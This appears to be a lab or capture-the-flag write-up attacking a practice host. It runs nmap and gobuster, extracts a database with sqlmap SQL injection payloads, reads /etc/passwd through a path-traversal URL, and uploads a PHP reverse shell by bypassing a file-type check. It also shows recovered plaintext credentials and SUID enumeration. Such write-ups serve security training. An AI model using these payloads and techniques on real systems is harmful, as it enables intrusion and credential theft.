
RECON

nmap -v -sT -p- -T5 10.10.209.216 -o results.txt
Warning: The -o option is deprecated. Please use -oN

Starting Nmap 7.60 ( https://nmap.org ) at 2024-03-10 16:09 GMT
Initiating ARP Ping Scan at 16:09
Scanning 10.10.209.216 [1 port]
Completed ARP Ping Scan at 16:09, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:09
Completed Parallel DNS resolution of 1 host. at 16:09, 0.00s elapsed
Initiating Connect Scan at 16:09
Scanning ip-10-10-209-216.eu-west-1.compute.internal (10.10.209.216) [65535 ports]
Discovered open port 22/tcp on 10.10.209.216
Discovered open port 53/tcp on 10.10.209.216
Discovered open port 21/tcp on 10.10.209.216
Discovered open port 1883/tcp on 10.10.209.216
Discovered open port 1337/tcp on 10.10.209.216
Completed Connect Scan at 16:09, 2.41s elapsed (65535 total ports)
Nmap scan report for ip-10-10-209-216.eu-west-1.compute.internal (10.10.209.216)
Host is up (0.0040s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
53/tcp   open  domain
1337/tcp open  waste
1883/tcp open  mqtt
MAC Address: 02:CD:DA:8E:3E:21 (Unknown)

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.75 seconds
           Raw packets sent: 1 (28B) | Rcvd: 1 (28B)

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

nmap -v --script vuln -p 21,22,53,1337,1883 -T5 10.10.209.216 -o vuln_results.txt
Warning: The -o option is deprecated. Please use -oN

Starting Nmap 7.60 ( https://nmap.org ) at 2024-03-10 16:13 GMT
NSE: Loaded 101 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:13
Completed NSE at 16:13, 10.00s elapsed
Initiating NSE at 16:13
Completed NSE at 16:13, 0.00s elapsed
Initiating ARP Ping Scan at 16:13
Scanning 10.10.209.216 [1 port]
Completed ARP Ping Scan at 16:13, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:13
Completed Parallel DNS resolution of 1 host. at 16:13, 0.00s elapsed
Initiating SYN Stealth Scan at 16:13
Scanning ip-10-10-209-216.eu-west-1.compute.internal (10.10.209.216) [5 ports]
Discovered open port 21/tcp on 10.10.209.216
Discovered open port 22/tcp on 10.10.209.216
Discovered open port 53/tcp on 10.10.209.216
Discovered open port 1337/tcp on 10.10.209.216
Discovered open port 1883/tcp on 10.10.209.216
Completed SYN Stealth Scan at 16:13, 0.22s elapsed (5 total ports)
NSE: Script scanning 10.10.209.216.
Initiating NSE at 16:13
Completed NSE at 16:13, 1.08s elapsed
Initiating NSE at 16:13
Completed NSE at 16:13, 0.00s elapsed
Nmap scan report for ip-10-10-209-216.eu-west-1.compute.internal (10.10.209.216)
Host is up (0.00018s latency).

PORT     STATE SERVICE
21/tcp   open  ftp
|_sslv2-drown: 
22/tcp   open  ssh
53/tcp   open  domain
1337/tcp open  waste
1883/tcp open  mqtt
MAC Address: 02:CD:DA:8E:3E:21 (Unknown)
NSE: Script Post-scanning.
Initiating NSE at 16:13
Completed NSE at 16:13, 0.00s elapsed
Initiating NSE at 16:13
Completed NSE at 16:13, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 12.54 seconds
           Raw packets sent: 6 (248B) | Rcvd: 6 (248B)

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------





NMAP ENUMERATION 

nmap -v -A -p- -T5 10.10.209.216 -o OS_results.txt
Warning: The -o option is deprecated. Please use -oN

Starting Nmap 7.60 ( https://nmap.org ) at 2024-03-10 16:24 GMT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:24
Completed NSE at 16:24, 0.00s elapsed
Initiating NSE at 16:24
Completed NSE at 16:24, 0.00s elapsed
Initiating ARP Ping Scan at 16:24
Scanning 10.10.209.216 [1 port]
Completed ARP Ping Scan at 16:24, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:24
Completed Parallel DNS resolution of 1 host. at 16:24, 0.00s elapsed
Initiating SYN Stealth Scan at 16:24
Scanning ip-10-10-209-216.eu-west-1.compute.internal (10.10.209.216) [65535 ports]
Discovered open port 53/tcp on 10.10.209.216
Discovered open port 21/tcp on 10.10.209.216
Discovered open port 22/tcp on 10.10.209.216
Warning: 10.10.209.216 giving up on port because retransmission cap hit (2).
Discovered open port 1337/tcp on 10.10.209.216
SYN Stealth Scan Timing: About 24.85% done; ETC: 16:26 (0:01:34 remaining)
SYN Stealth Scan Timing: About 49.23% done; ETC: 16:26 (0:01:03 remaining)
SYN Stealth Scan Timing: About 73.32% done; ETC: 16:26 (0:00:33 remaining)
Discovered open port 1883/tcp on 10.10.209.216
Completed SYN Stealth Scan at 16:27, 169.93s elapsed (65535 total ports)
Initiating Service scan at 16:27
Scanning 5 services on ip-10-10-209-216.eu-west-1.compute.internal (10.10.209.216)
Completed Service scan at 16:27, 11.08s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against ip-10-10-209-216.eu-west-1.compute.internal (10.10.209.216)
Retrying OS detection (try #2) against ip-10-10-209-216.eu-west-1.compute.internal (10.10.209.216)
NSE: Script scanning 10.10.209.216.
Initiating NSE at 16:27
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 16:27, 9.64s elapsed
Initiating NSE at 16:27
Completed NSE at 16:27, 0.00s elapsed
Nmap scan report for ip-10-10-209-216.eu-west-1.compute.internal (10.10.209.216)
Host is up (0.00030s latency).
Not shown: 65530 closed ports
PORT     STATE SERVICE                 VERSION
21/tcp   open  ftp                     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.167.185
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh                     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
53/tcp   open  domain                  ISC BIND 9.16.1-Ubuntu
| dns-nsid: 
|_  bind.version: 9.16.1-Ubuntu
1337/tcp open  http                    Apache httpd 2.4.41 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: EXPOSED
1883/tcp open  mosquitto version 1.6.9
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|     $SYS/broker/version: mosquitto version 1.6.9
|     $SYS/broker/publish/messages/sent: 26
|     $SYS/broker/uptime: 1287 seconds
|     $SYS/broker/bytes/sent: 1052
|     $SYS/broker/load/sockets/5min: 0.39
|     $SYS/broker/load/messages/received/15min: 0.20
|     $SYS/broker/retained messages/count: 36
|     $SYS/broker/publish/bytes/sent: 121
|     $SYS/broker/clients/total: 1
|     $SYS/broker/messages/stored: 33
|     $SYS/broker/load/bytes/sent/1min: 960.59
|     $SYS/broker/subscriptions/count: 2
|     $SYS/broker/load/sockets/1min: 1.67
|     $SYS/broker/store/messages/count: 33
|     $SYS/broker/load/messages/sent/15min: 1.92
|     $SYS/broker/heap/current: 51432
|     $SYS/broker/clients/connected: 1
|     $SYS/broker/load/publish/sent/15min: 1.72
|     $SYS/broker/store/messages/bytes: 149
|     $SYS/broker/load/messages/sent/5min: 5.69
|     $SYS/broker/load/messages/received/1min: 2.59
|     $SYS/broker/load/publish/sent/1min: 23.76
|     $SYS/broker/messages/sent: 29
|     $SYS/broker/load/bytes/received/15min: 4.56
|     $SYS/broker/load/connections/5min: 0.39
|     $SYS/broker/heap/maximum: 51912
|     $SYS/broker/load/bytes/sent/5min: 206.56
|     $SYS/broker/load/sockets/15min: 0.15
|     $SYS/broker/load/publish/sent/5min: 5.11
|     $SYS/broker/bytes/received: 69
|     $SYS/broker/messages/received: 3
|     $SYS/broker/clients/active: 1
|     $SYS/broker/load/messages/sent/1min: 26.34
|     $SYS/broker/load/messages/received/5min: 0.58
|     $SYS/broker/load/connections/1min: 1.67
|     $SYS/broker/load/connections/15min: 0.13
|     $SYS/broker/load/bytes/received/5min: 13.42
|     $SYS/broker/clients/maximum: 1
|     $SYS/broker/load/bytes/sent/15min: 69.70
|_    $SYS/broker/load/bytes/received/1min: 60.29
MAC Address: 02:CD:DA:8E:3E:21 (Unknown)
Aggressive OS guesses: Linux 3.8 (95%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 29.249 days (since Sat Feb 10 10:28:23 2024)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.30 ms ip-10-10-209-216.eu-west-1.compute.internal (10.10.209.216)

NSE: Script Post-scanning.
Initiating NSE at 16:27
Completed NSE at 16:27, 0.00s elapsed
Initiating NSE at 16:27
Completed NSE at 16:27, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.66 seconds
           Raw packets sent: 138533 (6.101MB) | Rcvd: 138508 (5.545MB)

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Manual Enumeration

ftp [ip] 

used ftp as username and left password blank - logged in



-> Navigated to the web server on port 1337 then ran gobuster against it to enumerate directories

obuster dir -u http://10.10.209.216:1337 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.209.216:1337
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/03/10 17:10:00 Starting gobuster
===============================================================
/admin (Status: 301)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/server-status (Status: 403)
===============================================================
2024/03/10 17:10:23 Finished
===============================================================


-------------------------------->

NOW TO ENUMERATE THE CONTENTS OF THE DIRECTORIES WE DISCOVERED

gobuster dir -u http://10.10.209.216:1337/admin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,conf,.css,.js

===============================================================
2024/03/10 17:13:55 Starting gobuster
===============================================================
/index.php (Status: 200)
/modules (Status: 301)
/assets (Status: 301)
===============================================================
2024/03/10 17:16:25 Finished
===============================================================


------------>

gobuster dir -u http://10.10.209.216:1337/phpmyadmin/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,conf,.css,.js

===============================================================
2024/03/10 17:16:49 Starting gobuster
===============================================================
/templates (Status: 403)
/index.php (Status: 200)
/print.css (Status: 200)
/themes (Status: 301)
/themes.php (Status: 200)
/doc (Status: 301)
/ajax.php (Status: 200)
/license.php (Status: 200)
/navigation.php (Status: 200)
/js (Status: 301)
/libraries (Status: 403)
/logout.php (Status: 200)
/url.php (Status: 302)
/changelog.php (Status: 200)
/export.php (Status: 200)
/sql (Status: 301)
/sql.php (Status: 200)
/locale (Status: 301)
/import.php (Status: 200)
/lint.php (Status: 200)
/server_status.php (Status: 200)
/phpinfo.php (Status: 200)
/db_search.php (Status: 200)
===============================================================
2024/03/10 17:19:22 Finished
===============================================================



------------------------------------------------------------------------------------------------------------------------------------------------------------------------

ENUMERATING/PLAYING AROUND WITH phpmyadmin/sql database

tried to log in to 10.10.194.73:1337/phpmyadmin/index.php

got error message:
mysqli_real_connect(): (HY000/1045): Access denied for user 'dd'@'localhost' (using password: YES)


<a href="./doc/html/index.html" - might be possible to directory traversal here

You can capture HTTP requests with Burp and then save them as files for SQLmap to run on

FOR GOBUSTER IN FUTURE USE THE /dirb/ wordlists

----

navigated to the /admin_101/ directory and made a login request with BURP Suite Proxy active 
Saved the request and ran sqlmap with it

sqlmap -r req --dump

log:

sqlmap identified the following injection point(s) with a total of 1555 HTTP(s) requests:
---
Parameter: email (POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: email=hacker@root.thm' AND EXTRACTVALUE(6464,CONCAT(0x5c,0x7178706a71,(SELECT (ELT(6464=6464,1))),0x71786a7871))-- aRpa&password=lol

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: email=hacker@root.thm' AND SLEEP(5)-- CLie&password=lol
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.1
available databases [6]:
[*] expose
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] sys

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: email=hacker@root.thm' AND EXTRACTVALUE(6464,CONCAT(0x5c,0x7178706a71,(SELECT (ELT(6464=6464,1))),0x71786a7871))-- aRpa&password=lol

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: email=hacker@root.thm' AND SLEEP(5)-- CLie&password=lol
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.1
Database: expose
[2 tables]
+--------+
| user   |
| config |
+--------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: email=hacker@root.thm' AND EXTRACTVALUE(6464,CONCAT(0x5c,0x7178706a71,(SELECT (ELT(6464=6464,1))),0x71786a7871))-- aRpa&password=lol

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: email=hacker@root.thm' AND SLEEP(5)-- CLie&password=lol
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.1
Database: expose
Table: user
[4 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| created  | timestamp    |
| email    | varchar(512) |
| id       | int          |
| password | varchar(512) |
+----------+--------------+

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: email=hacker@root.thm' AND EXTRACTVALUE(6464,CONCAT(0x5c,0x7178706a71,(SELECT (ELT(6464=6464,1))),0x71786a7871))-- aRpa&password=lol

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: email=hacker@root.thm' AND SLEEP(5)-- CLie&password=lol
---
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.1
Database: expose
Table: config
[2 entries]
+----+------------------------------+-----------------------------------------------------+
| id | url                          | password                                            |
+----+------------------------------+-----------------------------------------------------+
| 1  | /file1010111/index.php       | 69c66901194a6486176e81f5945b8929 (easytohack)       |
| 3  | /upload-cv00101011/index.php | // ONLY ACCESSIBLE THROUGH USERNAME STARTING WITH Z |
+----+------------------------------+-----------------------------------------------------+

Database: expose
Table: user
[4 entries]
+--------------------------------------+--------------------------------------+--------------------------------------+--------------------------------------+
| id                                   | email                                | created                              | password                             |
+--------------------------------------+--------------------------------------+--------------------------------------+--------------------------------------+
| 2023-02-21 09:05:46                  | 2023-02-21 09:05:46                  | 2023-02-21 09:05:46                  | 2023-02-21 09:05:46                  |
| hacker@root.thm                      | hacker@root.thm                      | hacker@root.thm                      | hacker@root.thm                      |
| 1                                    | 1                                    | 1                                    | 1                                    |
| VeryDifficultPassword!!#@#@!#!@#1231 | VeryDifficultPassword!!#@#@!#!@#1231 | VeryDifficultPassword!!#@#@!#!@#1231 | VeryDifficultPassword!!#@#@!#!@#1231 |
+--------------------------------------+--------------------------------------+--------------------------------------+--------------------------------------+

------------------------------------------------------------------------------------------------------------------------------------------------------------------------

After enumerating the SQL database, we visited the /file1010111/index.php location

Full URL - http://10.10.194.73:1337/file1010111/index.php

In this location we entered the password: easytohack
 
This led to a page that said:
Parameter Fuzzing is also important :) or Can you hide DOM elements?

Inspecting the page also gave us a hint:
Try file or view as GET parameters?

-> Next, decided to check for LFI by using:
?file=index.php:

http:/[ip]:1337/file1010111/index.php?file=index.php

By loading this while inputting the easytohack password, the page was reloaded with an apparent bug displaying.
This confirms LFI vuln. being present.

Therefore we can try out directory traversal:

http://10.10.194.73:1337/file1010111/index.php?file=../../../../etc/passwd

Inputting this with the easytohack passwd gave us the contents of the /etc/passwd file:


root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin sshd:x:109:65534::/run/sshd:/usr/sbin/nologin landscape:x:110:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:111:1::/var/cache/pollinate:/bin/false ec2-instance-connect:x:112:65534::/nonexistent:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false zeamkish:x:1001:1001:Zeam Kish,1,1,:/home/zeamkish:/bin/bash ftp:x:114:121:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin bind:x:115:122::/var/cache/bind:/usr/sbin/nologin Debian-snmp:x:116:123::/var/lib/snmp:/bin/false redis:x:117:124::/var/lib/redis:/usr/sbin/nologin mosquitto:x:118:125::/var/lib/mosquitto:/usr/sbin/nologin fwupd-refresh:x:119:126:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin


With this we have enumerated the user 'zeamkish' as well.

-------------------------------------------->

Next - navigated to the /upload-cv00101011/index.php location.
We input the username zeamkish to access the file upload page.


After this we got the PHP reverse shell we usually use:
https://github.com/JJkzn/HackTools/blob/main/Shells/Reverse%20PHP%20Shell

and created a file with it.

We uploaded a .png file to the upload server but used BurpSuite to replace the .png file with the php reverse shell file during the POST request.
After this we navigated to the upload point, activating the shell.php file while our netcat listener was running.
This gave us a shell.

we navigated to /home/zeamkish and got the ssh_creds.txt file:
SSH CREDS
zeamkish
easytohack@123

With these credentials we could SSH in as zeamkish and then were able to read the user flag.txt!
--------->
find / -type f -name flag.txt 2>/dev/null

To confirm the location of root flag:
/root/flag.txt

--

After this - Enumerated SUID capable files: find / -perm -u=s -type f 2>/dev/null

/snap/core20/1974/usr/bin/chfn
/snap/core20/1974/usr/bin/chsh
/snap/core20/1974/usr/bin/gpasswd
/snap/core20/1974/usr/bin/mount
/snap/core20/1974/usr/bin/newgrp
/snap/core20/1974/usr/bin/passwd
/snap/core20/1974/usr/bin/su
/snap/core20/1974/usr/bin/sudo
/snap/core20/1974/usr/bin/umount
/snap/core20/1974/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1974/usr/lib/openssh/ssh-keysign
/snap/core20/1950/usr/bin/chfn
/snap/core20/1950/usr/bin/chsh
/snap/core20/1950/usr/bin/gpasswd
/snap/core20/1950/usr/bin/mount
/snap/core20/1950/usr/bin/newgrp
/snap/core20/1950/usr/bin/passwd
/snap/core20/1950/usr/bin/su
/snap/core20/1950/usr/bin/sudo
/snap/core20/1950/usr/bin/umount
/snap/core20/1950/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1950/usr/lib/openssh/ssh-keysign
/snap/core/15511/bin/mount
/snap/core/15511/bin/ping
/snap/core/15511/bin/ping6
/snap/core/15511/bin/su
/snap/core/15511/bin/umount
/snap/core/15511/usr/bin/chfn
/snap/core/15511/usr/bin/chsh
/snap/core/15511/usr/bin/gpasswd
/snap/core/15511/usr/bin/newgrp
/snap/core/15511/usr/bin/passwd
/snap/core/15511/usr/bin/sudo
/snap/core/15511/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/15511/usr/lib/openssh/ssh-keysign
/snap/core/15511/usr/lib/snapd/snap-confine
/snap/core/15511/usr/sbin/pppd
/snap/core/15419/bin/mount
/snap/core/15419/bin/ping
/snap/core/15419/bin/ping6
/snap/core/15419/bin/su
/snap/core/15419/bin/umount
/snap/core/15419/usr/bin/chfn
/snap/core/15419/usr/bin/chsh
/snap/core/15419/usr/bin/gpasswd
/snap/core/15419/usr/bin/newgrp
/snap/core/15419/usr/bin/passwd
/snap/core/15419/usr/bin/sudo
/snap/core/15419/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/15419/usr/lib/openssh/ssh-keysign
/snap/core/15419/usr/lib/snapd/snap-confine
/snap/core/15419/usr/sbin/pppd
/snap/core18/2785/bin/mount
/snap/core18/2785/bin/ping
/snap/core18/2785/bin/su
/snap/core18/2785/bin/umount
/snap/core18/2785/usr/bin/chfn
/snap/core18/2785/usr/bin/chsh
/snap/core18/2785/usr/bin/gpasswd
/snap/core18/2785/usr/bin/newgrp
/snap/core18/2785/usr/bin/passwd
/snap/core18/2785/usr/bin/sudo
/snap/core18/2785/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2785/usr/lib/openssh/ssh-keysign
/snap/core18/2751/bin/mount
/snap/core18/2751/bin/ping
/snap/core18/2751/bin/su
/snap/core18/2751/bin/umount
/snap/core18/2751/usr/bin/chfn
/snap/core18/2751/usr/bin/chsh
/snap/core18/2751/usr/bin/gpasswd
/snap/core18/2751/usr/bin/newgrp
/snap/core18/2751/usr/bin/passwd
/snap/core18/2751/usr/bin/sudo
/snap/core18/2751/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/2751/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/umount
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/nano
/usr/bin/su
/usr/bin/fusermount
/usr/bin/find
/usr/bin/at
/usr/bin/mount



